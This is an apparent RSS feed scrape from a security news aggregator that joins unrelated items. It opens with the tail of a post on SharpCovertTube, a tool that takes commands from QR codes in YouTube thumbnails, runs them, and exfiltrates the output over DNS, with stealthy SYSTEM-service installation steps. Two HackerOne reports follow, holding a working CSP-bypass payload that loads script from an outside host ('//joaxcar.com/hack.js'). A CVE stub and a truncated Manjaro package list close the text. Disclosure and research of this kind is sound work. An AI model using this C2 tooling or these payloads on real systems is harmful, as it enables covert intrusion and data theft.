src="https://blogger.googleusercontent.com/img/a/AVvXsEi9IXZvxlsi4THSs_PDUDn-W2G0Za5wMMN7RGckUWk4cyxBPo8GiWw8SVHcWNkX2obK2nO5OLQOn1u_dcB7r339JWHGqV9pLp-dykKKhlAshPnKjewC9kQFGFavztX8PKfLiN6D3VsvUPIKjd2VOr2L8Q7i3YHfwIA56O6tQgjaDLlaka22bEqmTbKgJQ4=w640-h244" width="640"></a></p>  <br><span><b>Usage</b></span><br>  <p>Run the <a href="https://www.kitploit.com/search/label/Listener" target="_blank" title="listener">listener</a> in your Windows system:</p>  <p><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjBk8ZIitzktXhMGLXNYO3uiRVPuKCeYMJ3JjHCEia808NwsOYx-ZfCZM4mUvzC6rBd7KkcHkuCc8ZzKqM3Y0oyjjqVNFtP3YD-wwJjjB4VuTnUDnLngKUnK4LL_wqPr8YhNCUQ9jOzqWKziNSMOAARCSB87cQNCVs9gc6PKrOWGLdZy7kd6qiUysSYx0o"><img alt="" border="0" height="63" src="https://blogger.googleusercontent.com/img/a/AVvXsEjBk8ZIitzktXhMGLXNYO3uiRVPuKCeYMJ3JjHCEia808NwsOYx-ZfCZM4mUvzC6rBd7KkcHkuCc8ZzKqM3Y0oyjjqVNFtP3YD-wwJjjB4VuTnUDnLngKUnK4LL_wqPr8YhNCUQ9jOzqWKziNSMOAARCSB87cQNCVs9gc6PKrOWGLdZy7kd6qiUysSYx0o=w640-h63" width="640"></a></p>  <p>It will check the Youtube channel every a specific amount of time (10 minutes by default) until a new video is uploaded. In this case, we upload "whoami.avi" from the folder <a href="https://github.com/ricardojoserf/SharpCovertTube/tree/main/example-videos" rel="nofollow" target="_blank" title="example-videos">example-videos</a>:</p>  <p><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgzOXXXVRFR7mELFDj_yjL0PXteWvMa4tZ0HeHUjAkNqe2ZOzoZkoX3e6PhoOQSt-IWNLzzhXGb-SLhHd9qLQ9wOAPvAGrqWs441ROtk8i4cUDFzF1HxZS5aiitNsk0vQVPcArUQodRTyTD_VXgYEox0nXTd_PC69rP0CSLTw6OKPVnV7Uhk6WZoTahlZo"><img alt="" border="0" height="640" src="https://blogger.googleusercontent.com/img/a/AVvXsEgzOXXXVRFR7mELFDj_yjL0PXteWvMa4tZ0HeHUjAkNqe2ZOzoZkoX3e6PhoOQSt-IWNLzzhXGb-SLhHd9qLQ9wOAPvAGrqWs441ROtk8i4cUDFzF1HxZS5aiitNsk0vQVPcArUQodRTyTD_VXgYEox0nXTd_PC69rP0CSLTw6OKPVnV7Uhk6WZoTahlZo=w496-h640" width="496"></a></p>  <p>After finding there is a <a href="https://www.youtube.com/shorts/-JcDf4pF0qA" rel="nofollow" target="_blank" title="new video">new video</a> in the channel, it decodes the QR code from the video thumbnail, executes the command and the response is base64-encoded and exfiltrated using DNS:</p>  <p><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhHqCzfZL0YG85BePcjI6YIJnAnJaWZDjV-558defE0RSkzWgINrCgPdBgzJ_Q1tF-eQDILLe5zWoTydi7N7ECfaN9-7Ei_aULeaoixEg3zwtf79Slq2pbaIHH7TPUxjXqnUhwpoIs2ISQUjdwucSoLtKC-jvGKT7q3ikHhNVkLfMBB4b4nfbN2Ycc-lJ0"><img alt="" border="0" height="154" src="https://blogger.googleusercontent.com/img/a/AVvXsEhHqCzfZL0YG85BePcjI6YIJnAnJaWZDjV-558defE0RSkzWgINrCgPdBgzJ_Q1tF-eQDILLe5zWoTydi7N7ECfaN9-7Ei_aULeaoixEg3zwtf79Slq2pbaIHH7TPUxjXqnUhwpoIs2ISQUjdwucSoLtKC-jvGKT7q3ikHhNVkLfMBB4b4nfbN2Ycc-lJ0=w640-h154" width="640"></a></p>  <p>This works also for QR codes with AES-encrypted payloads and longer command responses. In this example, the file "dirtemp_aes.avi" from <a href="https://github.com/ricardojoserf/SharpCovertTube/tree/main/example-videos" rel="nofollow" target="_blank" title="example-videos">example-videos</a> is uploaded and the content of c:\temp is exfiltrated using several DNS queries:</p>  <p><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhTPvNS8RPgMVf6EfjaDDZwze07d2-nuHQvZc57iTECZkTDM19rgmCydcetRGi6kKQCAqobM-w2D9fnpZVgL-U87TXcC9MNHHCAB_dPfnIt2ddUmUnl9dzMd2yi9tHPpRpPuj9ecJxXK6WsQEG9Emx61fSMBIvYBSVzOYh0vfnZLJvKoVyi4xeiiWkrWX8"><img alt="" border="0" height="412" src="https://blogger.googleusercontent.com/img/a/AVvXsEhTPvNS8RPgMVf6EfjaDDZwze07d2-nuHQvZc57iTECZkTDM19rgmCydcetRGi6kKQCAqobM-w2D9fnpZVgL-U87TXcC9MNHHCAB_dPfnIt2ddUmUnl9dzMd2yi9tHPpRpPuj9ecJxXK6WsQEG9Emx61fSMBIvYBSVzOYh0vfnZLJvKoVyi4xeiiWkrWX8=w640-h412" width="640"></a></p>  <p>Logging to a file is optional but you must check the folder for that file exists in the system, the default value is "c:\temp\.sharpcoverttube.log". DNS <a href="https://www.kitploit.com/search/label/Exfiltration" target="_blank" title="exfiltration">exfiltration</a> is also optional and can be tested using Burp's collaborator:</p>  <p><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgRcitffHgow5OA5gmWl67qk1m9Ib8Uy3PmB-6RS3BEy09YIQN6-IpXAmHVzuSbSxtM2wqFZhMSVaptK31tYVQc6DhfZ5ASGi4SQEYogmvFa8iNZZxkQLKKN6sHYb00lJClWFCKbF08msxH-h8ldyaZYtWgZmNoWh7N5U2Odr6BlCrlGZB6_IIdU_77kBo"><img alt="" border="0" height="108" src="https://blogger.googleusercontent.com/img/a/AVvXsEgRcitffHgow5OA5gmWl67qk1m9Ib8Uy3PmB-6RS3BEy09YIQN6-IpXAmHVzuSbSxtM2wqFZhMSVaptK31tYVQc6DhfZ5ASGi4SQEYogmvFa8iNZZxkQLKKN6sHYb00lJClWFCKbF08msxH-h8ldyaZYtWgZmNoWh7N5U2Odr6BlCrlGZB6_IIdU_77kBo=w640-h108" width="640"></a></p>  <p>As an alternative, I created <a href="https://github.com/ricardojoserf/dns-exfiltration" rel="nofollow" target="_blank" title="this repository">this repository</a> with scripts to monitor and parse the base64-encoded DNS queries containing the command responses.</p>  <br><span><b>Configuration</b></span><br>  <p>There are some values you can change, you can find them in Configuration.cs file for the <a href="https://github.com/ricardojoserf/SharpCovertTube/blob/main/SharpCovertTube/Configuration.cs" rel="nofollow" target="_blank" title="regular binary">regular binary</a> and <a href="https://github.com/ricardojoserf/SharpCovertTube/blob/main/SharpCovertTube_Service/Configuration.cs" rel="nofollow" target="_blank" title="the service binary">the service binary</a>. Only the first two have to be updated:</p>  <ul>  <li><strong>channel_id</strong> (Mandatory!!!): Get your Youtube channel ID from <a href="https://www.youtube.com/account_advanced" rel="nofollow" target="_blank" title="here">here</a>.</li>  <li><strong>api_key</strong> (Mandatory!!!): To get the API key create an application and generate the key from <a href="https://console.cloud.google.com/apis/credentials" rel="nofollow" target="_blank" title="here">here</a>.</li>  <li><strong>payload_aes_key</strong> (Optional. Default: "0000000000000000"): AES key for decrypting QR codes (if using AES). It must be a 16-characters string.</li>  <li><strong>payload_aes_iv</strong> (Optional. Default: "0000000000000000"): IV key for decrypting QR codes (if using AES). It must be a 16-characters string.</li>  <li><strong>seconds_delay</strong> (Optional. Default: 600): Seconds of delay until checking if a new video has been uploaded. If the value is low you will exceed the API rate limit.</li>  <li><strong>debug_console</strong> (Optional. Default: true): Show debug messages in console or not.</li>  <li><strong>log_to_file</strong> (Optional. Default: true): Write debug messages in log file or not.</li>  <li><strong>log_file</strong> (Optional. Default: "c:\temp\.sharpcoverttube.log"): Log file path.</li>  <li><strong>dns_exfiltration</strong> (Optional. Default: true): Exfiltrate command responses through DNS or not.</li>  <li><strong>dns_hostname</strong> (Optional. Default: ".test.org"): DNS hostname to exfiltrate the response from commands executed in the system.</li>  </ul>  <p><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj0Gh5wuMqPA80RMaZKIf6-Ld0HbkYjEZ2hp_ogscmXhE69HCc7ttLUcvtYDKLeDPnr0-e0tgjbPaVVrPgjLKt4HOPDqkhbOqD-wB5KHLHCnEM-N3-tsc4byWjrE0Z1ofcmXpcXH6_iChErN018IFKZf1k8cOraHpdKKhm-mpCsRMlRuuw-0BC-QYsOb80"><img alt="" border="0" height="294" src="https://blogger.googleusercontent.com/img/a/AVvXsEj0Gh5wuMqPA80RMaZKIf6-Ld0HbkYjEZ2hp_ogscmXhE69HCc7ttLUcvtYDKLeDPnr0-e0tgjbPaVVrPgjLKt4HOPDqkhbOqD-wB5KHLHCnEM-N3-tsc4byWjrE0Z1ofcmXpcXH6_iChErN018IFKZf1k8cOraHpdKKhm-mpCsRMlRuuw-0BC-QYsOb80=w640-h294" width="640"></a></p>  <br><span><b>Generating videos with QR codes</b></span><br>  <p>You can generate the videos from Windows using Python3. For that, first install the dependencies:</p>  <pre><code>pip install Pillow opencv-python pyqrcode pypng <a href="https://www.kitploit.com/search/label/Pycryptodome" target="_blank" title="pycryptodome">pycryptodome</a> rebus<br></code></pre>  <p>Then run the generate_video.py script:</p>  <pre><code>python generate_video.py -t TYPE -f FILE -c COMMAND [-k AESKEY] [-i AESIV]<br></code></pre>  <ul>  <li>  <p>TYPE (-t) must be "qr" for payloads in cleartext or "qr_aes" if using AES encryption.</p>  </li>  <li>  <p>FILE (-f) is the path where the video is generated.</p>  </li>  <li>  <p>COMMAND (-c) is the command to execute in the system.</p>  </li>  <li>  <p>AESKEY (-k) is the key for AES encryption, only necessary if using the type "qr_aes". It must be a string of 16 characters and the same as in Program.cs file in SharpCovertTube.</p>  </li>  <li>  <p>AESIV (-i) is the IV for AES encryption, only necessary if using the type "qr_aes". It must be a string of 16 characters and the same as in Program.cs file in SharpCovertTube. </p>  </li>  </ul>  <br><b>Examples</b><br>  <p>Generate a video with a QR value of "whoami" in cleartext in the path c:\temp\whoami.avi:</p>  <pre><code>python generate_video.py -t qr -f c:\temp\whoami.avi -c whoami<br></code></pre>  <p>Generate a video with an AES-encrypted QR value of "dir c:\windows\temp" with the key and IV "0000000000000000" in the path c:\temp\dirtemp_aes.avi:</p>  <pre><code>python generate_video.py -t qr_aes -f c:\temp\dirtemp_aes.avi -c "dir c:\windows\temp" -k 0000000000000000 -i 0000000000000000<br></code></pre>  <p><br></p>  <p><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgLQoLmBbHKnOoHbqon0qBg9FF75GTHmRZVFUGXF9-SUYwHLhK9vtmAoVnOKSkJJT9bVfsMuYtIDIh3b49M7ttt1gzabRpkdUtGg8wiDDRzKeiJ2pBlJuNuhrJgwPRd1T9Pi9Ot2qG6kc7shP20imFZv0MbXvVNQaZD9Q2kVa6a1tUzeO0APatrp5TF3DA"><img alt="" border="0" height="96" src="https://blogger.googleusercontent.com/img/a/AVvXsEgLQoLmBbHKnOoHbqon0qBg9FF75GTHmRZVFUGXF9-SUYwHLhK9vtmAoVnOKSkJJT9bVfsMuYtIDIh3b49M7ttt1gzabRpkdUtGg8wiDDRzKeiJ2pBlJuNuhrJgwPRd1T9Pi9Ot2qG6kc7shP20imFZv0MbXvVNQaZD9Q2kVa6a1tUzeO0APatrp5TF3DA=w640-h96" width="640"></a></p>  <br><span><b>Running it as a service</b></span><br>  <p>You can find the code to run it as a service in the <a href="https://github.com/ricardojoserf/SharpCovertTube/tree/main/SharpCovertTube_Service" rel="nofollow" target="_blank" title="SharpCovertTube_Service folder">SharpCovertTube_Service folder</a>. It has the same functionalities except self-deletion, which would not make sense in this case.</p>  <p>It possible to install it with InstallUtil, it is prepared to run as the SYSTEM user and you need to install it as administrator:</p>  <pre><code>InstallUtil.exe SharpCovertTube_Service.exe<br></code></pre>  <p>You can then start it with:</p>  <pre><code>net start "SharpCovertTube Service"<br></code></pre>  <p><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgYY3U8wgtcwaqaUCDM_9EZ0_xH8ski1gFSOqqM9VWc23i6_27Xb0REqkBF5wgIGnCIURTOqcBIrvQAcKgOO1ZFRFY85B-ADJ7ii3-lc69dxOwRxMFq7iuC1qj5BBNUhaNTr7OuO8ilwboTGBXMZIFNhIrSoGTE2XsCps09x8gNrlZIMUhffFoa7Qkg6G0"><img alt="" border="0" height="162" src="https://blogger.googleusercontent.com/img/a/AVvXsEgYY3U8wgtcwaqaUCDM_9EZ0_xH8ski1gFSOqqM9VWc23i6_27Xb0REqkBF5wgIGnCIURTOqcBIrvQAcKgOO1ZFRFY85B-ADJ7ii3-lc69dxOwRxMFq7iuC1qj5BBNUhaNTr7OuO8ilwboTGBXMZIFNhIrSoGTE2XsCps09x8gNrlZIMUhffFoa7Qkg6G0=w640-h162" width="640"></a></p>  <p>In case you have administrative privileges this may be stealthier than the ordinary binary, but the "Description" and "DisplayName" should be updated (as you can see in the image above). If you do not have those privileges you can not install services so you can only use the ordinary binary.</p>  <br><span><b>Notes</b></span><br>  <ul>  <li>  <p><strong>File must be 64 bits!!!</strong> This is due to the code used for QR decoding, which is borrowed from Stefan Gansevles's <a href="https://github.com/Stefangansevles/QR-Capture" rel="nofollow" target="_blank" title="QR-Capture">QR-Capture</a> project, who borrowed part of it from Uzi Granot's <a href="https://github.com/Uzi-Granot/QRCode" rel="nofollow" target="_blank" title="QRCode">QRCode</a> project, who at the same time borrowed part of it from Zakhar Semenov's <a href="https://github.com/free5lot/Camera_Net" rel="nofollow" target="_blank" title="Camera_Net">Camera_Net</a> project (then I lost track). So thanks to all of them!</p>  </li>  <li>  <p>This project is a port from <a href="https://github.com/ricardojoserf/covert-tube" rel="nofollow" target="_blank" title="covert-tube">covert-tube</a>, a project I developed in 2021 using just Python, which was inspired by Welivesecurity blogs about <a href="https://www.welivesecurity.com/2019/10/03/casbaneiro-trojan-dangerous-cooking/" rel="nofollow" target="_blank" title="Casbaneiro">Casbaneiro</a> and <a href="https://www.welivesecurity.com/2021/09/17/numando-latam-banking-trojan/" rel="nofollow" target="_blank" title="Numando">Numando</a> malwares.</p>  </li>  </ul><br><br><div><b><span><a class="kiploit-download" href="https://github.com/ricardojoserf/SharpCovertTube" rel="nofollow" target="_blank" title="Download SharpCovertTube">Download SharpCovertTube</a></span></b></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[PortSwigger Web Security: CSP Bypass and escalation of https://hackerone.com/reports/2279346]]></title>
<description><![CDATA[Hello Team ,  I have gone through this report https://hackerone.com/reports/2279346 and their is CSP bypass where website has implemented security in that but after this i can escalate Again CSP bypass with using different Script . As shown in https://hackerone.com/reports/2279346 report website ...]]></description>
<link>https://tsecurity.de/de/2044391/sicherheitsluecken/portswigger-web-security-csp-bypass-and-escalation-of-httpshackeronecomreports2279346/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2044391/sicherheitsluecken/portswigger-web-security-csp-bypass-and-escalation-of-httpshackeronecomreports2279346/</guid>
<pubDate>Fri, 23 Feb 2024 18:59:25 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<br><img height="200" width="200" src="http://vulners.com/static/img/hackerone.png" alt="image"><br>Hello Team ,  I have gone through this report https://hackerone.com/reports/2279346 and their is CSP bypass where website has implemented security in that but after this i can escalate Again CSP bypass with using different Script . As shown in https://hackerone.com/reports/2279346 report website rectify the scripts like:  document.getElementsByTagName(&amp;quot;div&amp;quot;)[0].innerHTML=&amp;lt;iframe srcdoc=&amp;quot;&amp;lt;div lang=en ng-app=application ng-csp class=ng-scope&amp;gt; &amp;lt;script src=&amp;#x27;https://www.google.com/recaptcha/about/js/main.min.js&amp;#x27;&amp;gt;&amp;lt;/script&amp;gt; &amp;lt;img src=x ng-on-error=&amp;#x27;w=$event.target.ownerDocument;a=w.defaultView.top.document.querySelector(&amp;amp;quot;[nonce]&amp;amp;quot;);b=w.createElement(&amp;amp;quot;script&amp;amp;quot;);b.src=&amp;amp;quot;//joaxcar.com/hack.js&amp;amp;quot;;b.nonce=a.nonce;w.body.appendChild(b)&amp;#x27;&amp;gt; &amp;lt;/div&amp;gt; &amp;quot;&amp;gt; But their is new way where i can escalate the bug with new script which is :  var demo=document.createElement(&amp;quot;img&amp;quot;); demo.src=&amp;quot;https://i.ytimg.com/vi/0vxCFIGCqnI/maxresdefault.jpg&amp;quot;;  document.body.innerHTML=&amp;quot;&amp;quot;;demo.width=&amp;quot;1000&amp;quot;; demo.height=&amp;quot;1000&amp;quot;; document.body.appendChild(demo); F3074920 Steps:  Go to https://portswigger.net/ Inject the script in console tab and see the impact In this website configuration on CSP header is not proper . In my attachment their is no header for img in CSP . So attacker can escalate the bug again with different scripts. F3074919 Thanks  Priyanshu Impact Escalate the bug with new script CSP bypass using img...]]></content:encoded>
</item>
<item>
<title><![CDATA[PortSwigger Web Security: CSP bypass on PortSwigger.net using Google script resources]]></title>
<description><![CDATA[Summary Hi team! I read this blogpost again after playing with an Angular CSP bypass in this Twitter thread https://twitter.com/sudhanshur705/status/1732760081094091117 I found a way to load arbitrary scripts (escaping the restrictions of Angular) if the page uses nonce-based CSP. As show in the ...]]></description>
<link>https://tsecurity.de/de/2036776/sicherheitsluecken/portswigger-web-security-csp-bypass-on-portswiggernet-using-google-script-resources/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2036776/sicherheitsluecken/portswigger-web-security-csp-bypass-on-portswiggernet-using-google-script-resources/</guid>
<pubDate>Mon, 19 Feb 2024 00:38:05 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<br><img height="200" width="200" src="http://vulners.com/static/img/hackerone.png" alt="image"><br>Summary Hi team! I read this blogpost again after playing with an Angular CSP bypass in this Twitter thread https://twitter.com/sudhanshur705/status/1732760081094091117 I found a way to load arbitrary scripts (escaping the restrictions of Angular) if the page uses nonce-based CSP. As show in the Twitter thread https://www.google.com/recaptcha/about/js/main.min.js contains Angular, and your CSP allows the complete https://www.google.com/recaptcha/ URL First of all this allows for simple JS execution, such as ```html   ``` this will pop an alert. This allows for some JS execution, but eval and Function escalations from Angular will be blocked by the lack of unsafe-inline. I found that this can be bypassed when a site is using nonce based CSP like this html &amp;lt;img src=x ng-on-error=&amp;#x27; w=$event.target.ownerDocument; a=w.defaultView.top.document.querySelector(&amp;quot;[nonce]&amp;quot;); b=w.createElement(&amp;quot;script&amp;quot;); b.src=&amp;quot;//example.com/evil.js&amp;quot;; b.nonce=a.nonce; w.body.appendChild(b) &amp;#x27;&amp;gt; POC  Go to https://portswigger.net/ Open devtools and paste and execute this (replace //joaxcar.com/hack.js if you want) javascript document.getElementsByTagName(&amp;quot;div&amp;quot;)[0].innerHTML=`&amp;lt;iframe srcdoc=&amp;quot;&amp;lt;div lang=en ng-app=application ng-csp class=ng-scope&amp;gt; &amp;lt;script src=&amp;#x27;https://www.google.com/recaptcha/about/js/main.min.js&amp;#x27;&amp;gt;&amp;lt;/script&amp;gt; &amp;lt;img src=x...]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2023-6959 | Getwid Gutenberg Blocks Plugin up to 2.0.4 on WordPress Recaptcha API Key Modification authorization (ID 3022982)]]></title>
<description><![CDATA[A vulnerability was found in Getwid Gutenberg Blocks Plugin up to 2.0.4 on WordPress. It has been declared as problematic. This vulnerability affects unknown code of the component Recaptcha API Key Modification. The manipulation leads to missing authorization.

This vulnerability was named CVE-20...]]></description>
<link>https://tsecurity.de/de/2026910/sicherheitsluecken/cve-2023-6959-getwid-gutenberg-blocks-plugin-up-to-204-on-wordpress-recaptcha-api-key-modification-authorization-id-3022982/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2026910/sicherheitsluecken/cve-2023-6959-getwid-gutenberg-blocks-plugin-up-to-204-on-wordpress-recaptcha-api-key-modification-authorization-id-3022982/</guid>
<pubDate>Sun, 11 Feb 2024 00:21:01 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.getwid:gutenberg_blocks_plugin">Getwid Gutenberg Blocks Plugin up to 2.0.4</a> on WordPress. It has been declared as <a href="https://vuldb.com/?kb.risk">problematic</a>. This vulnerability affects unknown code of the component <em>Recaptcha API Key Modification</em>. The manipulation leads to missing authorization.

This vulnerability was named <a href="https://vuldb.com/?source_cve.251404">CVE-2023-6959</a>. The attack can be initiated remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2023-12-05 - Kernels, KDE Plasma, Gamescope-Plus, TuxClocker]]></title>
<description><![CDATA[Hello community,
Another testing branch update with some usual package updates for you.

Get the lastest SoftMaker Office with ChatGPT buillt-in. You will find our Special Offer here!
Recent News:

Manjaro, like many other open-source projects, relies on the generosity of its community through do...]]></description>
<link>https://tsecurity.de/de/1953342/unix-server/testing-update-2023-12-05-kernels-kde-plasma-gamescope-plus-tuxclocker/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1953342/unix-server/testing-update-2023-12-05-kernels-kde-plasma-gamescope-plus-tuxclocker/</guid>
<pubDate>Thu, 07 Dec 2023 01:07:44 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello community,</p>
<p>Another <strong>testing</strong> branch update with some usual package updates for you.</p>
<p><img src="https://forum.manjaro.org/uploads/default/original/3X/4/2/42e8550ce72aa8ff000d704ed0fa0a698556b13e.jpeg" alt="image" data-base62-sha1="9xThw8e1scYGHvHqifKkf1T8ODQ" width="580" height="326"><br>
<em>Get the lastest <a href="https://www.softmaker.com/en/products/softmaker-office">SoftMaker Office with ChatGPT buillt-in</a>. You will find our <a href="https://softmaker.com/go/manjaro">Special Offer here</a>!</em></p>
<p><strong>Recent News:</strong></p>
<ul>
<li>Manjaro, like many other open-source projects, relies on the generosity of its community through <a href="https://manjaro.org/donate/">donations</a> and corporate sponsorships to support its growth and development. These <a href="https://manjaro.org/donate/">donations</a> are essential in covering the various expenses incurred in the operations of the project such as server costs, software development tools, infrastructure expenses, training, flying people to events or <a href="https://blog.manjaro.org/fosdem-2023/">conferences</a> and the salaries of key developers. With the help of these donations, Manjaro is able to secure the necessary financial stability that allows the project to continuously improve and remain active. If you love Manjaro, consider to <a href="https://manjaro.org/donate/">donate</a>!</li>
</ul>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/testing-update-2023-12-05-kernels-kde-plasma-gamescope-plus-tuxclocker/152811/1">(click for more details)</a>
<p><strong>Notable Package Updates:</strong></p>
<ul>
<li>Some <strong>Kernels</strong> got updated
<ul>
<li>mostly changes due to hardware development for the ASUS ROG ALLY</li>
</ul>
</li>
<li><strong>KDE Plasma</strong> <a href="https://kde.org/announcements/plasma/5/5.27.10/">5.27.10</a></li>
<li><strong>Phosh</strong> <a href="https://phosh.mobi/releases/rel-0.34.0/">0.34.0</a></li>
<li><strong>tuxclocker</strong> is at <a href="https://www.phoronix.com/news/TuxClocker-1.4-Released">1.4.0</a></li>
<li><strong>gamescope-plus</strong> got updated to <a href="https://github.com/ChimeraOS/gamescope/releases/tag/3.13.16-plus1">3.13.16-plus1</a></li>
<li>Usual <strong>KDE-git</strong>, <strong>Haskell</strong> and <strong>Python</strong> updates</li>
</ul>
<h2><a name="additional-info-1" class="anchor" href="https://forum.manjaro.org/#additional-info-1"></a>Additional Info</h2>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2023-12-05-kernels-kde-plasma-gamescope-plus-tuxclocker/152811/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux419 4.19.300</li>
<li>linux54 5.4.262</li>
<li>linux510 5.10.202</li>
<li>linux515 5.15.141</li>
<li>linux61 6.1.65</li>
<li>linux65 6.5.13 [EOL]</li>
<li>linux66 6.6.4</li>
<li>linux67 6.7-rc4</li>
<li>linux61-rt 6.1.64_rt17</li>
<li>linux65-rt 6.5.2_rt8</li>
<li>linux66-rt 6.6.0_rt15</li>
</ul>
<p><strong>Package Changes</strong> (Tue Dec 5 18:16:49 CET 2023)</p>
<ul>
<li>testing core x86_64:  6 new and 6 removed package(s)</li>
<li>testing extra x86_64:  367 new and 358 removed package(s)</li>
<li>testing kde-unstable x86_64:  19 new and 18 removed package(s)</li>
<li>testing multilib x86_64:  1 new and 1 removed package(s)</li>
</ul>
<pre><code class="lang-auto">:: Different overlay package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2023-12-04           2023-12-05
-------------------------------------------------------------------------------
                          linux61-rt        6.1.59_rt16-1        6.1.64_rt17-1
                  linux61-rt-headers        6.1.59_rt16-1        6.1.64_rt17-1
                             linux66              6.6.4-2              6.6.4-4
                     linux66-headers              6.6.4-2              6.6.4-4
                             linux67           6.7.0rc4-1           6.7.0rc4-3
                     linux67-headers           6.7.0rc4-1           6.7.0rc4-3


:: Different overlay package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2023-12-04           2023-12-05
-------------------------------------------------------------------------------
             ayatana-indicator-sound            23.10.2-1            23.10.3-1
                      gamescope-plus      3.13.13.plus1-1      3.13.16.plus1-1
                linux61-rt-acpi_call             1.2.2-11             1.2.2-12
                 linux61-rt-bbswitch               0.8-11               0.8-12
              linux61-rt-broadcom-wl      6.30.223.271-11      6.30.223.271-12
             linux61-rt-nvidia-390xx           390.157-11           390.157-12
             linux61-rt-nvidia-470xx         470.223.02-2         470.223.02-3
                   linux61-rt-nvidia          545.29.06-1          545.29.06-2
                    linux61-rt-r8168           8.052.01-2           8.052.01-3
                linux61-rt-rtl8723bu          20220818-11          20220818-12
                 linux61-rt-tp_smapi               0.44-5               0.44-6
              linux61-rt-vhba-module          20211218-11          20211218-12
  linux61-rt-virtualbox-host-modules             7.0.12-2             7.0.12-3
                   linux66-acpi_call             1.2.2-15             1.2.2-17
                    linux66-bbswitch               0.8-15               0.8-17
                 linux66-broadcom-wl      6.30.223.271-15      6.30.223.271-17
                linux66-nvidia-390xx           390.157-15           390.157-17
                linux66-nvidia-470xx        470.223.02-16        470.223.02-18
                      linux66-nvidia         545.29.06-11         545.29.06-13
                       linux66-r8168          8.052.01-15          8.052.01-17
                   linux66-rtl8723bu          20220818-15          20220818-17
                    linux66-tp_smapi              0.44-15              0.44-17
                 linux66-vhba-module          20211218-15          20211218-17
     linux66-virtualbox-host-modules            7.0.12-15            7.0.12-17
                         linux66-zfs              2.2.2-2              2.2.2-4
                   linux67-acpi_call            1.2.2-0.4            1.2.2-0.6
                    linux67-bbswitch              0.8-0.4              0.8-0.6
                 linux67-broadcom-wl     6.30.223.271-0.4     6.30.223.271-0.6
                linux67-nvidia-390xx          390.157-0.4          390.157-0.6
                linux67-nvidia-470xx       470.223.02-0.3       470.223.02-0.5
                      linux67-nvidia        545.29.06-0.3        545.29.06-0.5
                       linux67-r8168         8.052.01-0.4         8.052.01-0.6
                    linux67-tp_smapi             0.44-0.4             0.44-0.6
                 linux67-vhba-module         20211218-0.4         20211218-0.6
     linux67-virtualbox-host-modules           7.0.12-0.4           7.0.12-0.6
                       steam-deckify           20231203-1           20231205-1
                          tuxclocker              1.3.2-1              1.4.0-1
                                warp              0.6.1-1              0.6.2-1


:: Different sync package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2023-12-04           2023-12-05
-------------------------------------------------------------------------------
                             arch-hs          0.11.1.0-88          0.11.1.0-89
                      aspnet-runtime       8.0.0.sdk100-1       8.0.0.sdk100-2
               aspnet-targeting-pack       8.0.0.sdk100-1       8.0.0.sdk100-2
                               broot             1.29.0-1             1.30.0-1
                       cabal-install          3.4.1.0-157          3.4.1.0-158
                          cargo-hack             0.6.13-1             0.6.14-1
                              catch2             2.13.9-1            2.13.10-1
                               darcs           2.16.5-219           2.16.5-220
                               dhall           1.41.2-120           1.41.2-121
                          dhall-bash           1.0.40-231           1.0.40-232
                          dhall-docs            1.0.11-66            1.0.11-67
                          dhall-json           1.7.11-136           1.7.11-137
                    dhall-lsp-server            1.1.2-155            1.1.2-156
                          dhall-yaml           1.2.11-137           1.2.11-138
                         dotnet-host       8.0.0.sdk100-1       8.0.0.sdk100-2
                      dotnet-runtime       8.0.0.sdk100-1       8.0.0.sdk100-2
                          dotnet-sdk       8.0.0.sdk100-1       8.0.0.sdk100-2
       dotnet-source-built-artifacts       8.0.0.sdk100-1       8.0.0.sdk100-2
               dotnet-targeting-pack       8.0.0.sdk100-1       8.0.0.sdk100-2
                               espup              0.9.0-1             0.10.0-1
                fcitx5-pinyin-zhwiki   1:0.2.4.20231016-1   1:0.2.4.20231205-1
                                 feh             3.10.1-2             3.10.2-1
           firefox-developer-edition            121.0b6-1            121.0b7-1
  firefox-developer-edition-i18n-ach            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-af            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-an            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-ar            121.0b6-1            121.0b7-1
  firefox-developer-edition-i18n-ast            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-az            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-be            121.0b6-1            121.0b7-1
   firefox-developer-edition-i18n-bg            121.0b6-1            121.0b7-1
